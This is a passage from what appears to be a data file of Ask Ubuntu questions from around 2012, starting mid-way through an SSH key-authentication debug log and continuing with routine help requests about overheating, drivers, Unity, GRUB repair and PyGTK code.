hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 133/256 debug2 : bits set : 495/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host 'cloud.com ' is known and matches the rsa host key . debug1 : found key in /home/liam/.ssh/known_hosts:30 debug2 : bits set : 513/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/liam/si_id_rsa.pub ( 0x673430 ) debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : offering public key : /home/liam/si_id_rsa.pub debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp 7c : cd : e3:0c:90:8a : ff:65 : e1:39:54:46:03 : c8:12 : fc debug1 : pem_read_privatekey failed debug1 : read pem private key done : type < unknown > enter passphrase for key '/home/liam/si_id_rsa.pub ' : debug2 : no passphrase given , try next key debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey ) . in case i had made some sort of error in creating the key i tried the process again ensuring i did not enter a passphrase . can anyone tell me what i am doing wrong or where to find some more info on what i am attempting to do ?
153570	how to actually submit my app to ubuntu app showdown ?	how to actually submit app to ubuntu app showdown ? i wanted to know how to make my submitted app eligible for app showdown . i know that i have to create a ppa at launchpad and submit my app to ubuntu software center . but how will they come to know that it is for ubuntu app show down ? can you tell me step by step ?
153575	where does gnome/nautilus store directory icons	on some key folders in nautilus i 've changed the folder icons . it looks nice , and aids my productivity because i can easily find important folders in a mass of others . but then i move to another machine and all the folders are plain again . so the question is where is this stored , and is there a way to have it persist between users/systems .
153579	missing /apps/gnome_settings_daemon/plugins/keyboard	i installed gconf-editor and i am not seeing the /apps/gnome_settings_daemon/plugins/keyboard . how can i fix this ?
153580	open dialog , created with quickly does not work	i tried to open a dialog like david planella describs here ( and quickly help add ) : open custom dialog windows ( pygtk + quickly ) but this do n't works for me . i always get the same error-message if i open the creadted dialog : attributeerror : 'module ' object has no attribute 'newdialognamedialog' ( note : my dialog-name is replaced with `` newdialognamedialog '' to be more general . ) i tried to test a tutorial for the ubuntu app showdown to learn how to use quickly and python . i can also add the whole source-code if you wish .
153582	apt-get -f install gives error	when i run apt-get -f install , it gives the following error : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libcdio10 lp-solve libunique-1.0-0 libgmime-2.4-2 libcdio-paranoia0 hplip-cups libmagickcore3 libtaglib2.0-cil libgkeyfile1.0-cil zeitgeist-extension-fts libgudev1.0-cil linux-headers-3.0.0-12 libtextcat-data libgdata1.9-cil libglew1.5 libproxy0 libgexiv2-0 libmagickwand3 libgnomevfs2-common linux-headers-3.0.0-12-server libgupnp-1.0-3 libwebkitgtk-1.0-common python-indicate libnux-1.0-common libboost-date-time1.46.1 libindicator3-6 linux-headers-3.0.0-19-generic banshee python-webkit python-aptdaemon.gtkwidgets libindicator6 gir1.2-gconf-2.0 libjavascriptcoregtk-1.0-0 libept1 banshee-extension-soundmenu libgnomevfs2-0 libmono-zeroconf1.0-cil libvpx0 python-telepathy libgdata1.7-cil libminiupnpc5 libnotify0.4-cil libpoppler-glib6 python-aptdaemon-gtk libtextcat0 libgtk-sharp-beans-cil gnome-utils-common libxss1 libhunspell-1.2-0 unity-2d-places libjpeg62 : i386 libquvi0 libexiv2-10 libgupnp-igd-1.0-3 gnome-desktop-data libgtkspell3-0 libnautilus-extension1 libwebkitgtk-1.0-0 gir1.2-dee-0.5 libcdio-cdda0 libmusicbrainz4c2a python-wnck libmagickcore3-extra libglewmx1.5 libnux-1.0-0 libgmime2.4-cil libnatpmp1 unity-2d-launcher libgssdp-1.0-2 libllvm2.9 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : postgresql-9.1 suggested packages : oidentd ident-server locales-all the following packages will be upgraded : postgresql-9.1 1 upgraded , 0 newly installed , 0 to remove and 80 not upgraded . 2 not fully installed or removed . need to get 0 b/4,290 kb of archives . after this operation , 295 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 252269 files and directories currently installed . ) preparing to replace postgresql-9.1 9.1.3-0ubuntu0.11.10 ( using ... /postgresql-9.1_9.1.4-0ubuntu12.04_amd64.deb ) ... * stopping postgresql 9.1 database server * insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 246 . insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 255 . ( does not shutdown gracefully , now stopping immediately ) [ fail ] invoke-rc.d : initscript postgresql , action `` stop '' failed . dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... * stopping postgresql 9.1 database server * insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 246 . insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 255 . ( does not shutdown gracefully , now stopping immediately ) [ fail ] invoke-rc.d : initscript postgresql , action `` stop '' failed . dpkg : error processing /var/cache/apt/archives/postgresql-9.1_9.1.4-0ubuntu12.04_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/postgresql-9.1_9.1.4-0ubuntu12.04_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to uninstall postgresql but could not do it . please advice .
153585	is 1gb ram with integrated graphics sufficient for unity 3d on 12.04 ?	i have been using ubuntu since hardy heron ( 8.04 ) . i used natty , oneiric with unity . but when i recently ( more than 1 month now ) upgraded my ubuntu to precise ( 12.04 ) , the performance of my laptop is not satisfactory . it is too unresponsive compared to older releases . for example , the unity in 12.04 is very unresponsive . sometimes , it requires 2 seconds to show up the dash ( which was not the case with natty , though people always saying that natty 's version of unity is buggiest ) . i am assuming that , may be my 1gb ram now becomes too low to run unity of precise . but i also think , since unity is improved in precise , it may not be the case . so , i am not sure . do you have any ideas ? will upgrading ram fix it ? how much i need if upgrade is required ? laptop model : `` lenovo 3000 y410 '' graphic : `` intel gma x3100 '' on intel 965gm chipset . ram/memory : `` 1 gb ddr2 '' ( 1 slot empty ) . swap space : 1.1gb resolution : 1280x800 widescreen shared ram for graphics : 256 mb as below output suggests $ dmesg | grep agp [ 0.825548 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000
153588	custom emoticons in empathy	i 'm trying to use empathy instead of kopete , i want to have access to my custom emoticons which i also used in kopete . i installed them seperately and my contacts could receive them . is that kind of thing possible to do in empathy ? besides the standard emoticons , can new emoticons be added and seen by other contacts ? i 'm using empathy 3.5.1 on ubuntu 12.10 .
153590	no battery indicator in panel 12.04	on ac power or battery power , i can not get a battery status indicator to show in the 12.04 panel . i have tried : 1 ) checked the power settings and battery is set to show all the time . 2 ) sudo apt-get purge indicator-power then sudo apt-get install indicator-power no change . 3 ) running gnome-settings-daemon and get : '' ( gnome-settings-daemon:5514 ) : gnomedesktop-warning ** : timed out waiting for gl_max_texture_size helper ** ( gnome-settings-daemon:5514 ) : warning ** : you can only run one xsettings manager at a time ; exiting ** ( gnome-settings-daemon:5514 ) : warning ** : unable to start xsettings manager : could not initialize xsettings manager . ** ( gnome-settings-daemon:5514 ) : warning ** : name taken or bus went away - shutting down ( gnome-settings-daemon:5514 ) : print-notifications-plugin-critical ** : gsd_print_notifications_plugin_finalize : assertion `plugin- > priv ! = null ' failed '' no change . 4 ) adding a detailed status indicator per instructions on http : //www.omgubuntu.co.uk/2011/02/battery-applet-status-ubuntu/ no success as of yet . i am good at following directions , but a n00b at searching out the root of problems . this seems to be a fairly common one for 12.04 users , so any other solutions or help will greatly appreciated . thanks .
153592	where are kile settings stored ?	i want to give someone else my settings and preferences for kile ( latex editor ) . a quick googling would reveal where those settings are strored . can askubuntu help me ?
153597	editing gsettings ; add icon to launcher by command	although there are several posts on the internet on the subject , i did not find a solution yet : my goal is to find a command that adds an icon ( .desktop file ) to the unity launcher and shows it immediately . when i open dconf-editor ( desktop > unity > launcher ) and i add an item to the favorites list , it shows at once in the launcher , so my idea is that it must be possible to do the same thing by command . the solutions i found so far on the internet do not do the job . i need to do it by command , to use in a quicklist editor i am working on . you would make someone unbelievably happy if you could help out
153602	sound only comes in headphones does n't come out of the speakers on a hp pavilion dv6 1280us	i am newbie of ubuntu 12.04 with gnome3 shell . laptop model : hp pavilion dv6 1280us full updates installed . i can hear sound played only when headphones are plugged in . regular inbuilt speakers does n't work . speakers are fine , it should be some technical configuration/driver issue with os . they work in the windows os in the same laptop . kindly check these two snapshots : ubuntu geeks kindly help me !
153603	ca n't get usb flash drive to boot	i created a usb stick using universal usb installer and file ubuntu-12.04-desktop-amd64.iso . when i plug it into my notebook and start up it just freezes with the following message . syslinux 4.06 edd 4.06-pre1 copyright ( c ) 1994-2011 h. peter anvin et al this appears at the top of a blank screen . please , does anyone know how to sort this ? i want to install ubuntu onto my notebook which does n't have a cd/dvd drive .
153609	how can i remove picture metadata like in windows 7 ?	windows 7 has a nifty feature where user can remove a picture 's metadata in windows 7 user goes to properties > details tab > `` remove properties and personal information '' does ubuntu have similar feature ? how can i remove a picture 's metadata using ubuntu ?
153610	help with java : i want to reduce how many java installed i have down to 1 .	i have used many different methods to install java because i want to get minecraft working . i heared that if i uninstall java it would installed libre office , which i do not want to do . i have a install of sun java , so i think what i 'll do is delete all my openjdk copies , and excess sun java 7 copies . all i want is to rid myself of everything java except for one so i can stop feeling so java cluttered ( among other things , no doubt i 've got libreoffice all confused as to who to choose ) . screenshot from my /usr/lib/jvm folder :
153612	black screen while playing games	after 5 minutes of playing amnesia the dark descent in linux version and other games running on wine i get a black screen . during these days i only installed software from the ubuntu software center , downloaded some source tar.gz files and edited some personal text files . nothing special at all which makes me wonder what is going on with my machine ... these are the only games i have installed ( along with gtr2 which i have not tested ) .i run both games 3 times and got the same result . os : pinguy os 11.04 ( ubuntu based ) kernel : linux 2.6.38-9-generic ( i686 ) de : gnome 2.32.1 cpu : amd athlon ( tm ) 64 x2 dual core processor 4200+ 2200.33mhz ram : 2gb gpu : nvidia geforce 240 hd : seagate 500gb 7200 rpm
153613	unable to upgrade from ubuntu server 12.04 to ubuntu server 12.10 alpha 1	as per advice from below link i tried to upgrade from 12.04 to 12.10 alpha 1 but not bable to do it . i am using hp proliant server . https : //wiki.ubuntu.com/quantalquetzal/technicaloverview/alpha1 dpkg -l | grep update-manager-core ii update-manager-core 1:0.156.14.5 manage release upgrades root @ test2 : ~ # do-release-upgrade -d checking for a new ubuntu release no new release found root @ test2 : ~ #
153618	bumblebee overheating	my laptop samsung rf411 ( geforce 540m ) is overheating when i run optirun glxspheres the temperature of the core jumps to 97c and the gpu to 72c and after some minuties the computer shutdown . an strange thing is that the gpu in windows goes 84c and the core stays in 86c . i think that should be a problem in controlling the fan speed . i 'm using ubuntu 12.04 , kernel 3.2.0-25-generic and the drive of nvidia is 302.17 .
153619	where are gtk+ icons stored ?	i would like to know where are the gtk+ themes icons stored ? for example , where are the ambiance theme gui icons stored ? ( like the go back , go up , search icons )
153622	ca n't connect to wireless broadcom bcm4312 , using wifi	i have a problem connecting my dell vostro 1520 to wireless internet . output of rfkill : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 3 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no i 've tried other solutions like /etc/modprobe.d $ sudo gedit blacklist.conf and blacklisting the 43xx part , also tried getting sudo apt-get install firmware-b43-installer and sudo apt-get install b43-fwcutter and at last i 've tried installing th privative ( ? ) drivers for the wireless card . ( broadcom sta wireless driver ) , with following result for lspci : 0e:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) it 's obvious i 've the switch turned [ on ] , but it says that wireless is disabled by hardware switch and when i enter `` system settings -â¸ network -â¸ airplane mode '' it is turned [ on ] and when i turn it [ off ] and try to turn [ on ] the wireless button , it goes to [ off ] position automatically . thanks for the help .
153627	unity-lens-music takes long time to retrieve information from hdd	everytime i open the dash and go to the music lens to search for a specific title , it takes quite a while till any titles are displayed and i can hear my hdd working during the process . i did n't copy too many of my cds to my laptop so i do n't really get why it takes the lens so long to load any matches . is there a way to make the lens search from a customized database ? or does it use an approach like that by default ? after reading the whole music library once the lens works really snappy and instantly displays titles . sadly everytime i reboot and go back to the lens it again takes much longer to display any results , as if it needs to build a new database after every reboot . unfortunately i was n't able to find a lot of information about the music lens and how it works so i ask here . i 'd be happy to get some clarification and maybe a few hints as to whats going wrong .
153630	overheating laptop	i 've been using ubuntu for ~2 months , when i installed it on my computer ( laptop ) it never overheat but a day , i do n't know what happened , it over heated.. ( 70*c @ idle ) i 've tryed what ever i found on the net , and as well , i ca n't change the cpu freq o.o , i5 m460 @ 2.53 ghz.. i have benn trying , jupiter ( no result ) , lm-sensors ( aswell ) , and the cpu freq thingy for unity ( cpu wont move from 2.5ghz ) any help ? ( i 'm a c++ user and php coder ... )
153634	how to enable the filter of the video lens ?	i did upgrade from 11.10 to 12.04 but i 'm facing problem that the filter of the video lens is not enabled . is there any help to enable this filter so i can search videos even on the network ? thanks in advance
153641	attempting to grep details of a java error	i 'm running ubuntu 11 and i 'm having some issues with grep . i have a shell script ( see below ) which essentially checks if a certain java program of mine is running , if not it runs it . that part works out great ! if my java application throws any kind of exception however i would like to capture that information and email it to myself . how can i go about checking to see if the call to java -jar /bin/myapp.jar fails ? i tried piping it to grep , but that does n't seem to work . below is the full script that i 've written : # check if myapp.jar is running , if not run it . if [ $ ( ps aux | grep 'java ' | grep -v grep | wc -l | tr -s `` \n '' ) -eq 0 ] then echo `` packetcapture starting ... \n '' java -jar /bin/myapp.jar echo `` packetcapture started.\n '' else echo `` packetcapture already running.\n '' fi
153643	ca n't authorize facebook in gwibber	whenever i try to add facebook account in gwibber , it gives the following error : **unable to load page** problem occurred while loading the url https : //graph.facebook.com/oauth/authorize ? scope=publish_stream % 2cread_stream % 2cstatus_update % 2coffline_access % 2cuser_photos % 2cfriends_photos & redirect_uri=http % 3a % 2f % 2fwww.facebook.com % 2fconnect % 2flogin_success.html & type=user_agent & display=popup & client_id=71b85c6d8cb5bbb9f1a3f8bbdcdd4b05 ** can not resolve proxy hostname ( ) ** how can i fix it ?
153646	how can i run a complete application from ram ?	when i do some stuff in background ( unpacking , compiling , backup , etc . ) my hdd is under load and for example , firefox and chromium take very long to start and react very slow . while my hdd is under load i have still plenty of free ram and free cpu . how can i copy the whole firefox or chromium including all dependencies into ram ? i do n't care about persistence , i just want to view some websites , videos , etc . there are instructions putting the cache into /dev/shm , but that did n't speed up so much . getting the profile into the ram drive might also be easy ... but how to get the binaries with all dependencies into ram ?
153647	macbook 8.1 overheating	i have a macbook 8.1 with ubuntu 12.04 installed . but my cpu is getting very hot . on mac my cpu is 50-60째c warm . but on ubuntu my mac is getting very hot and is by about 60째c but with min 3000rpm instead of 2000 on mac and the fan is getting very loud with 4500rpm on ubuntu when im browsing ( without flash ) or doing something else . i set it to 3000rpm because it is not getting so noisy instead of 2000rpm minimum . but thats not that what im expected . what ive done : i installed lm-sensors to see the temperatures and started the sensors-detect i installed macfancld , jupiter , the newest drivers from x-updates and installed the i965-va-driver oh and i installed mesa - with the default version my sandbridge was displayed as unknown i added grub_cmdline_linux_default= '' quiet splash acpi=force drm.vblankoffdelay=1 pcie_aspm=force drm.vblankoffdelay=1 i915.semaphores=1 i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 '' ive added rfkill block bluetooth to /etc/rc.local to switch of bluetooth by default on boot my mac is not as noisy as before but it is noisy and sometimes very hot i hope you can help me
153648	desktop sharing options for ubuntu 12.04 with unity	i would like to be able to access my office ubuntu 12.04 machine from home , from a mac mini with mac osx . i have a vpn and i am able to access my office machine over ssh , so connectivity is not a problem . i browsed other questions , and it seems that there are several options : vnc xrdp freenx ( have n't heard this one before ) are there any other ? i have been using remote desktop on windows before , and i actually like it . not sure how well is xrdp implemented . i also used vnc several years back , and i did n't like its performance back then - not sure if things have changed since then . as i said above , the machine i want to access is running ubuntu 12.04 , with unity . and i am using unity by choice - i really like it and would like to continue using it : ) the client computer is running mac osx ( snow leopard ) . based on your previous experience what is the best setup for this environment ?
153651	keyboard / keymap problems with xubuntu 12.04 + nx nomachine	i 'm running nx client on my macbook pro to connect to a xubuntu 12.04 desktop at work . i have configured nx client to start up a console upon connection . i am able to connect to my remote linux machine and i get a simple xterm console . however , when i run xfce4-session , half my keys no longer work . for example , when i launch a terminal , i typing a , s , or d works , but if type w , e , r , or t , the cursor just blinks . if i ctrl-c out of xfce4-session , all the keys work fine in my xterm console . if i run xev , this is the output for when i hit a key that works : keyrelease event , serial 34 , synthetic no , window 0x2e00001 , root 0x373 , subw 0x0 , time 170160781 , ( -45 , -21 ) , root : ( 824,429 ) , state 0x4 , keycode 16 ( keysym 0x63 , c ) , same_screen yes , xlookupstring gives 1 bytes : ( 03 ) `` '' xfilterevent returns : false keyrelease event , serial 34 , synthetic no , window 0x2e00001 , root 0x373 , subw 0x0 , time 170160781 , ( -45 , -21 ) , root : ( 824,429 ) , state 0x4 , keycode 67 ( keysym 0xffe3 , control_l ) , same_screen yes , xkeysymtokeycode returns keycode : 63 xlookupstring gives 0 bytes : xfilterevent returns : false but when i hit a key that does n't work : focusout event , serial 34 , synthetic no , window 0x2e00001 , mode notifygrab , detail notifyancestor focusin event , serial 34 , synthetic no , window 0x2e00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 34 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 any ideas on what i can do to troubleshoot this issue ? googling around offered a few suggestions ( like playing with xmodmap ) but nothing seemed to work . also , one thing worth mentioning is that i do not have any keyboard issues when remoting into a different ubuntu 10 box via nx .
153652	no receive option in bluetooth settings	guys i am trying to send a file from my galaxy s2 to ubuntu but its keep dropping the connection but im able to send a file from ubuntu to mobile . i have seen this link botskool.com and its mentioned there is a receive files option in bt preferences . but in my bt settings its no where to be seen . help
153655	how to add button to nautilus toolbar in ubuntu 12.04 ?	how do i add bottons to nautilus toolbar , such as delete , new folder , cut , paste , etc . in ubuntu 11.04 i did that by editing the file `` /usr/share/nautilus/ui/nautilus-navigation-window-ui.xml '' , but in 12.04 this file no longer exist . so , how do i do that now ?
153656	how do i run an executable truecrypt file from a pendrive ?	i am trying to run portable truecrypt from a usb pendrive . i already extracted the package and all but the only way i can really open truecrypt portable is if the executable is somewhere in my home folder . it never does when i open the executable from the pendrive . i 'm using ubuntu 12.04 . i have tried to go to permissions and set `` allow to run as an application '' but anyway when double-clicking , the same alert comes up : unable to present media/kingston/usr/bin/truecrypt , there is no application installed for executable files . however it does open normally from home folder , so i do not understand this output that ubuntu ca n't find an application to open executable files , given that it opens them just fine as long as they are present in the home folder . i 've formatted another pendrive as nfts first and then as ext4 to check if it was related to filesystems , opened it with full administrative rights , extracted truecrypt files there , but still the same error returns , and while attempting to execute the file from terminal , permission is denied .
153660	what is the difference between edubuntu and ubuntu ?	i have always used edubuntu rather than ubuntu because i have many children including home educated ones who casually use the education offerings . i appreciate many but not all of the extra offerings . i never got beyond 8.04.4 lts , so am considering updating . i note now with edubuntu 12.04 it is > 2gb i.e.4 times bigger , even apparently using squashfs . i do now have to consider whether the extra resources are worth it in each computer in my household . i am sick of reading over and over again 'edubuntu is ubuntu with extras such as blah blah ' , and in a different place the same thing but with a different blah blah . i downloaded edubuntu 12.04 and ran it 'live ' . ca n't say i got on at all with the unity interface ( this can be changed when installed ) , but the apparent education stuff seemed quite small and pathetic , i am obviously not finding it . is there anywhere a full list of what edubuntu has pre-installed has over ubuntu , so a sensible decision can be made whether to go for it , or just add packages that look relevant to me to ubuntu . is there truly no other difference between ubuntu/edubuntu but the extra educational packages ? ( i for example have no school server , but if i understood exactly what is involved , with the number of computers in the house , it may be worth creating one ! )
153664	pygtk/quickly add string to liststore	i 'm trying to build an application that will prompt the user for a string , and then add that string to a scrolling listview object using quickly and pygtk . i 've been following this tutorial : http : //developer.ubuntu.com/resources/app-developer-cookbook/multimedia/creating-a-simple-media-player/ when i hit the add button , the prompt comes up properly and i 'm able to enter the string . the column appears correctly but the list ends up being blank . what am i doing wrong ? import gettext from gettext import gettext as _ gettext.textdomain ( 'spiderweb ' ) from gi.repository import gtk # pylint : disable=e0611 import logging logger = logging.getlogger ( 'spiderweb ' ) from spiderweb_lib import window from spiderweb.aboutspiderwebdialog import aboutspiderwebdialog from spiderweb.preferencesspiderwebdialog import preferencesspiderwebdialog from quickly import prompts from quickly.widgets.dictionary_grid import dictionarygrid import os # see spiderweb_lib.window.py for more details about how this class works class spiderwebwindow ( window ) : __gtype_name__ = `` spiderwebwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( spiderwebwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutspiderwebdialog self.preferencesdialog = preferencesspiderwebdialog # code for other initialization actions should be added here . self.supported_web_formats = [ `` .net '' , '' .html '' , `` .com '' ] def on_addbutton_clicked ( self , widget , data=none ) : # let the user choose a path with the directory chooser response , string = prompts.string ( `` enter a string '' , `` please enter string : '' , `` sample text '' ) # make certain the user said ok before working if response == gtk.responsetype.ok : # make a list of the supported media files media_files = gtk.liststore ( str ) # add a dictionary to the list of media files media_files.append ( { `` string '' : string } ) # remove any children in scrolled window for c in self.ui.scrolledwindow1.get_children ( ) : self.ui.scrolledwindow1.remove ( c ) # create the grid with list of dictionaries # only show the file column media_grid = dictionarygrid ( media_files , keys= [ `` file '' ] ) # show the grid , and add it to the scrolled window media_grid.show_all ( ) self.ui.scrolledwindow1.add ( media_grid )
153666	usb microphone ( samson c01u ) works , then disappears	i recently upgraded from ubuntu 11.10 to 12.04 . my samson c01u usb microphone , which has worked for many years on ubuntu , now is having problems . the symptom is as follows . after a reboot , the microphone works as expected . recording with audacity is fine . then , after some indeterminate amount of time , the microphone disappears from the system . that is , it is no longer listed in pavucontrol or alsamixer . unplugging and re-plugging the microphone does not resolve the problem . occasionally , the microphone will appear in pavucontrol for an instant on re-plug , but disappear immediately . i have disabled pulseaudio and observed the same behavior . ( that is , the microphone works fine , then after some time is no longer a valid `` card '' in alsamixer . ) the only relevant-looking line in the syslog is as follows . the timing correlates to the disappearance of the microphone , and the usb device number is that of the microphone . kernel : [ 63194.088077 ] usb 2-4 : reset full-speed usb device number 12 using ohci_hcd
153668	glibcxx 3.4.14 on ubuntu 10.04	is there a way of getting glibcxx 3.4.14 on ubuntu 10.04 ? i am trying to use the z3 solver from microsoft in my research but it requires at least glibcxx 3.4.14 which is not available in my setup . thanks
153669	how to upgrade from 11.10 to 12.04 when you 've got a problem ?	i have recently installed 8gb ram into my ubuntu machine but when i look on the specs it only comes up with 2.8gb of ram so i want to upgrade to 12.04 but when i try to upgrade it says it ca n't because it cant find the archive to update a program first and when it tries to delete or update the program it dosent work . so how do i upgrade to 12.04 with these problems ?
153672	how to add a printer in gnome-shell	i 'm using gnome shell ( although i 'm not sure whether the `` printers '' app is part of that or just part of gnome ) . i go to `` printers '' from the overview , click the + button on the bottom left , choose network and then see a message `` firewalld is not running . network printer detection needs services mdns , ipp , ipp-client and samba-client enabled on firewall. '' . it 's not auto detected anything . there 's an address box and a search by address tickbox , but neither seem to do anything . i 'm frustrated because i know all the details of the printer , but have nowhere to put them in . automation is supposed to make things easier , no ? for example i know the printer is at lpd : //10.67.5.3/lp1 but i ca n't put this in anywhere . is there a gui that works , or have i misunderstood how to use it ?
153681	ubuntu one crashes at launch . what should i do ?	as soon as i log in i get notified of a ubuntu one crash report . how can i fix this or what do i need to do ?
153691	screen does n't display after resume using x-swat nvidia drivers	i upgraded the nvidia drivers from the x-swat ppa on my sony vaio vpcf1390x laptop . everything seems to be working great , but suspend/resume . the laptop successfully suspends and seems to resume ; the screen backlighting comes on , but the screen is blank . it wo n't comeback until i force a reboot . this issue is 100 % reproducible every time . resume worked perfectly before the update , so it 's seems to be nvidia driver related . i realize i could probably go back the the previous default proprietary drives , but i 'd like to make this work . current nvidia driver version is 302.17
153692	how are ubuntu bugs ' importance values decided ?	how is a specific bug 's importance decided for bugs against packages in ubuntu ? and by importance , i mean 'low ' , 'medium ' , and other importance values on the launchpad bug trackers .
153695	how to batch rename files but not directories ?	i have lots of files that need an extension appended to them but they are in a directory with lots of subdirectories . currently the files have no extension at all . how would i rename just the files but not rename any of the directories or subdirectories ?
153700	live dvd boot - lost launcher in unity	i wanted to check out the latest ( 12.04 ) version of ubuntu to see if the unity shell had improved , so i booted my dell latitude with a live dvd . my laptop is connected to a docking station , and i have two monitors hooked into it . happily , the system started properly and even detected the two monitors . oddly , unity 's launcher bar appeared on each screen . when i pressed the ubuntu dash button , i saw a close button ( `` x '' ) to kill the launcher on the right monitor , but then i saw that i could close the left monitor 's launcher too . when i did that , i saw no way to respawn the launcher . my question is two-fold : a ) how do i relaunch launcher if it 's been closed , and b ) how do i configure the system to only load a launcher on the left monitor ?
153701	have lost grub been overwitten by w7 recovery	accidently i chose recovery of windows in my grub menu and it promptly overwote now i dont have any boot at all . i have tried various methods with no success for example as below but when i get to sudo chroot /mnt it says unable to resolve host ubuntu . running 11.10 x64 you 'll need to install grub manually . to do that you 'll have to boot up using a live cd then do the following : setup a chroot environment . open a terminal and mount the root partition to /mnt sudo mount /dev/sdxy /mnt sdxy being the root partition of your installed ubuntu , e.g . /dev/sda5 . you can find that out using sudo fdisk -l next , mount some virtual devices sudo mount -bind /dev /mnt/dev sudo mount -bind /proc /mnt/proc sudo mount -bind /sys /mnt/sys chroot into the installed system sudo chroot /mnt finally , ( re ) install grub grub-install -- recheck /dev/sdx sdx is the internal hard drive , probably /dev/sda and while we 're at it , we may as well update it , too . update-grub if there were no errors during the installation , you can type `` exit '' to leave chroot nd then simply reboot the computer . you should then be able to boot both windows and linux .
153707	braid and psychonauts wont download	i am running ubuntu 12.04 and i am having a problem with downloading braid and psychonauts from the ubuntu software center . an error message pops up saying `` failed to download repository information '' . what does that mean ?
153710	how to switch between unity and gnome ( or recovery console ) from serial-console	i am currently working over a serial-console ( from desktop computer to a developing board ) ... i tried switching between this three visual alternatives : unity , gnome and recovery console ( using the board devices , not serial-console ) ... they worked perfectly ... but for some reason , my keyboard stopped working on the board just when i switched to recovery console , and the only way to control the device is through the desktop serial-console ... does anyone know how to go back to gnome or unity from serial-console ? i tried gnome-shell -- replace and unity -- replace but : window manager error : unable to open x display ** ( gnome-shell:6053 ) : warning ** : command line `dbus-launch -- autolaunch=b6a0f5be3cacff6ccdea054a00000008 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n ... so any ideas ? ? thank you !
153712	is ubuntu an embedded linux system ?	i 'm currently studying about linux in general and what it is . i see that linux is a high-performance operating system that breathes life to old hardware . ubuntu is a distribution of linux . but i 'm uncertain whether ubuntu is an embedded system . embedded systems execute applications without an overhead kernel , and android is a prime example in the mobile world . is ubuntu an embedded system as well ? whether it is or is not , how does this fact account for the high performance of the system ?
153716	computer under ubuntu 12.04 randomly locking up when inactive	i am sure someone has had a similar problem somewhere in the world , but i 've not really been able to find a way out of this . my install is as clean as i can make it ( what can you do wrong with ubuntu ! ; ) ) , and the computer is running smoothly . but every now and then , randomly , and only when not in use ( often over night ) , it sometimes locks up . the computer then does n't respond to my mouse or keyboard ( where for example i can not change the status of num lock or caps lock - the light stays on ) , the screen remains blank , and i need to restart the computer using the front-button . if this was every 6 months or so , it would n't bother me at all , but this is more along the lines of 1-2 times a week now ... although i could n't estimate if it is regular , or more or less than `` before '' . there should really be no particular activity running ( that is n't running when i 'm on the computer ) that would cause my pc to lock when inactive ... my question now is , what would be the best approach to solving the problem ? i am guessing , logging activity to look for suspicious processes ? how would i go best about logging this , and if i do , would someone be willing to have a look at the output and try to help ? : ) thanks a lot in advance ! bisi
153723	how can i contribute a keyboard layout ( ipa ) to ubuntu ?	i have a launchpad account , but i 've never contributed any code to ubuntu before . i 'd like to contribute an ipa keyboard layout , since it seems there is n't one already , and there should be . the easiest way i found to input ipa involves installing lots of third-party packages . if i make a new keyboard layout , i 'd like for it to be available to the community , after some testing , of course .
